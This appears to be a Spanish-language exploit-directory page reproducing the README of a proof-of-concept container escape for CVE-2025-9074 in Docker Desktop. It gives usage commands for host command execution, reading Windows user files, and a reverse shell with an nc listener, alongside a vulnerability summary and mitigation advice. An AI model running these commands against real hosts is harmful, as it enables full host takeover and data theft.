Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-9074-Docker-Desktop-Container-Escape — Exploit de prueba de concepto para CVE-2025-9074 - Escape de contenedor no autenticado de la API del motor Docker que afecta a Docker Desktop < 4.44.3 en Windows y macOS (CVSS 9.3) | Kitploit
Herramientas/GitHubGitHub/ptechamanja/cve-2025-9074-docker-desktop-container-escape
Seguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónSeguridad en la NubeRed TeamingEscape de Contenedores
GitHubptechamanja/cve-2025-9074-docker-desktop-container-escape

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-9074-Docker-Desktop-Container-Escape

Exploit de prueba de concepto para CVE-2025-9074 - Escape de contenedor no autenticado de la API del motor Docker que afecta a Docker Desktop < 4.44.3 en Windows y macOS (CVSS 9.3)

Ver Repositorio
23hace 9 mesesAún no revisado

CVE-2025-9074: PoC de Escape de Contenedor de Docker Desktop

CVE CVSS Platform

Exploit de Prueba de Concepto para CVE-2025-9074 - una vulnerabilidad crítica de escape de contenedor en Docker Desktop que permite acceso no autenticado a la API del Motor Docker.

Resumen de la Vulnerabilidad

PropiedadValor
ID CVECVE-2025-9074
Puntuación CVSS9.3 (Crítica)
Software AfectadoDocker Desktop < 4.44.3
Plataformas AfectadasWindows, macOS (Linux NO afectado)
Versión CorregidaDocker Desktop 4.44.3+
DescubridoresFelix Boulet, Philippe Dugré
Fecha de DescubrimientoMediados de 2025
Fecha del Parche20 de agosto de 2025

Detalles Técnicos

La vulnerabilidad permite que contenedores ejecutándose en Docker Desktop accedan a la API del Motor Docker en http://192.168.65.7:2375 sin autenticación. Esto ocurre independientemente de:

  • Configuración de Aislamiento Mejorado de Contenedores (ECI)
  • La configuración "Exponer demonio en tcp://localhost:2375 sin TLS"
  • Cualquier otra configuración de seguridad

Impacto

  • Windows (backend WSL): Control total del host con privilegios administrativos
  • macOS: Manipulación de contenedores y posible puerta trasera (limitada por solicitudes al usuario)
  • Linux: No vulnerable (usa socket Unix en lugar de TCP)

Causa Raíz

La API del Motor Docker estaba expuesta en un socket TCP accesible desde dentro de los contenedores, permitiendo:

  • Crear/eliminar contenedores
  • Montar sistemas de archivos del host
  • Ejecutar comandos privilegiados
  • Omisión completa del aislamiento de contenedores

Uso

imagen

Requisitos Previos

root@kitploit:~
pip3 install requests

Modo de Ejecución de Comandos

root@kitploit:~
# Execute a command on the host
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "whoami"

# Read files from Windows host
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "cat /hostfs/mnt/c/Users/Administrator/Desktop/root.txt"

# List users on Windows
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "ls -la /hostfs/mnt/c/Users"

Modo de Shell Inversa

root@kitploit:~
# Terminal 1: Set up listener
nc -lvnp 4444

# Terminal 2: Execute exploit
python3 exploit.py -u http://192.168.65.7:2375 -m reverse -l <YOUR_IP> -p 4444

# Once connected, host filesystem is at: /hostfs

Desde Dentro de un Contenedor

root@kitploit:~
# If you already have access to a container
curl http://192.168.65.7:2375/version

Escenario de Ataque

root@kitploit:~
graph TD
    A[Malicious Container] -->|No Auth Required| B[Docker Engine API<br/>192.168.65.7:2375]
    B -->|Create Container| C[Privileged Container]
    C -->|Mount Host FS| D[Full Host Access]
    D -->|Read/Write| E[Compromise System]

Mitigación

Acción Inmediata Requerida

Actualice a Docker Desktop 4.44.3 o superior inmediatamente.

root@kitploit:~
# Check your Docker Desktop version
docker --version

# Update Docker Desktop
# Windows: Download from https://desktop.docker.com/win/main/amd64/Docker%20Desktop%20Installer.exe
# macOS: Download from https://desktop.docker.com/mac/main/amd64/Docker.dmg

Soluciones Alternativas (Temporales)

Si la actualización inmediata no es posible:

  1. Evite ejecutar contenedores no confiables
  2. Monitoree las conexiones de red desde los contenedores
  3. Implemente segmentación de red
  4. Revise todas las imágenes de contenedores antes del despliegue

Referencias

  • Aviso de Seguridad de Docker
  • NVD CVE-2025-9074
  • Blog de Felix Boulet
  • Análisis de Philippe Dugré
  • Aviso de GitHub

Descargo de Responsabilidad

Esta herramienta se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.

  • Úsela solo contra sistemas que posea o para los cuales tenga permiso explícito para realizar pruebas
  • El acceso no autorizado a sistemas informáticos es ilegal
  • Los autores no asumen ninguna responsabilidad por el mal uso de este software

Créditos

  • Descubrimiento de la Vulnerabilidad: Felix Boulet, Philippe Dugré
  • Desarrollo del PoC: Amanja Francisco
  • Equipo de Seguridad de Docker: Por su rápida respuesta y parche

Licencia

Licencia MIT - Consulte el archivo LICENSE para más detalles

Descargar herramienta